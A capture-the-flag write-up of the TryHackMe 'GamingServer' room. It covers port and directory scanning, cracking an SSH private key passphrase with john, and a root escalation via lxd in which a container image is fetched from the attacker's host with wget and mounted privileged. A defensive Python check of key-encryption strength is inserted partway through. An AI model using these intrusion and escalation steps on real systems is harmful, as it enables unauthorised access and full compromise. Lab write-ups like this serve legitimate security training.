Writeup of the GamingServer room on TryHackMe.
First start by doing a port scan:
rustscan $IP
Results:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Then start dirbuster or gobuster to search for hidden files and directories:
gobuster dir -u $IP -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
If we head over to the about page at http://$IP/about.html we can see an uploads button which takes us to http://$IP/uploads. The uploads directory is also listed as disallowed in robots.txt.
The uploads directory:

"/uploads"
The dict.lst file appears to be a list of passwords and possibly usernames. After a quick look at the file I added a few lines of my own. Some of the existing entries follow the pattern Summer2017 and winter2016, so I generated the same pattern for 2018-2020 with all four seasons, adding each entry both with a capitalised and with a lowercase first letter.
The character in meme.jpg is Beaker from the Muppets, so I added that name to the password file and may also try it as a username going forward.
The manifesto does not contain much of interest, but it does carry an author name that can be used as a possible username. The manifesto could also hint that the server has already been compromised. I added the author name to the password file just in case.

That contains an SSH private key. Download it, restrict its permissions with "chmod 600 SecretKey", then create a hash file from it with ssh2john:
python ssh2john.py SecretKey > id_rsa.hash
Then crack it with john and the rockyou wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Results:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (id_rsa)
1g 0:00:00:12 DONE (2020-08-30 22:24) 0.08278g/s 1187Kp/s 1187Kc/s 1187KC/s *7¡Vamos!
Session completed
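The john output above reports cost 1 as 0 (MD5/AES) and cost 2 as 1 iteration: the key is stored in the legacy PEM format, whose passphrase derivation is a single MD5 pass, which is why rockyou can be pushed through it at over a million candidates per second. The check below is an added example, not part of the original writeup, that inspects a private key file and reports which container format and KDF protect it; both sample keys are constructed inline, the OpenSSH one only as far as the header fields the check reads.

```python
import base64, struct

MAGIC = b"openssh-key-v1\x00"

def _read_string(buf, off):
    # One SSH "string": uint32 big-endian length prefix followed by the bytes.
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(pem_text):
    """Return (format, encrypted, kdf, rounds) for a PEM-armoured SSH private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if "OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("missing openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        # bcrypt kdfoptions = string salt, uint32 rounds (rounds are the last 4 bytes)
        rounds = struct.unpack(">I", kdfopts[-4:])[0] if kdf == b"bcrypt" else 0
        return ("openssh-v1", cipher != b"none", kdf.decode(), rounds)
    # Legacy PEM: Proc-Type/DEK-Info headers flag encryption; the key is one MD5 pass.
    enc = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)
    return ("legacy-pem", enc, "md5" if enc else "none", 1 if enc else 0)

def assess(pem_text):
    fmt, enc, kdf, rounds = classify_private_key(pem_text)
    if not enc:
        return "unencrypted"
    if fmt == "legacy-pem":
        return "weak: legacy PEM, MD5 key derivation, 1 iteration"
    return f"ok: {kdf} KDF, {rounds} rounds"

# Constructed sample: legacy PEM header as older ssh-keygen wrote it; body is a placeholder.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF
cGxhY2Vob2xkZXIgYm9keQ==
-----END RSA PRIVATE KEY-----"""

def _s(b):  # SSH string encoder, used only to build the constructed sample
    return struct.pack(">I", len(b)) + b

def build_openssh_sample(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    # Constructed openssh-key-v1 blob holding only the header fields up to nkeys.
    opts = _s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = MAGIC + _s(cipher) + _s(kdf) + _s(opts) + struct.pack(">I", 1)
    armour = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{armour}\n-----END OPENSSH PRIVATE KEY-----"
```

Rewriting a key in place with ssh-keygen -p -o -a 100 -f SecretKey moves it to the openssh-key-v1 format with 100 bcrypt rounds, which this check reports as ok and which makes each passphrase guess cost far more than a single MD5.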
I then found a username that can be used for an SSH connection in the website source code, on the last line of https://$IP/index.html

As you can see there is a user called john. Connect to the server through SSH:
ssh john@$IP -i ./SecretKey
Enter the passphrase and you are logged in as john.

Now get the user flag
cat user.txt
a****************e
After looking around the machine I found an interesting service, lxd (Linux Containers), owned by root and usable by anyone. On your local machine, clone the following repo and run the build script:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Then start a simple web server
python -m SimpleHTTPServer
Then, on the target, download the image you just built:
cd /tmp
wget http://$LHOST:8000/alpine-v3.12-x86_64-20200830_2354.tar.gz
Replace $LHOST with your local IP address (run "ip addr" to find it). Import the image by running:
lxc image import ./alpine-v3.12-x86_64-20200830_2354.tar.gz --alias myimage
Then spawn a root shell by running these commands:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
whoami
Now get the root flag
cat mnt/root/root/flag.txt
2************c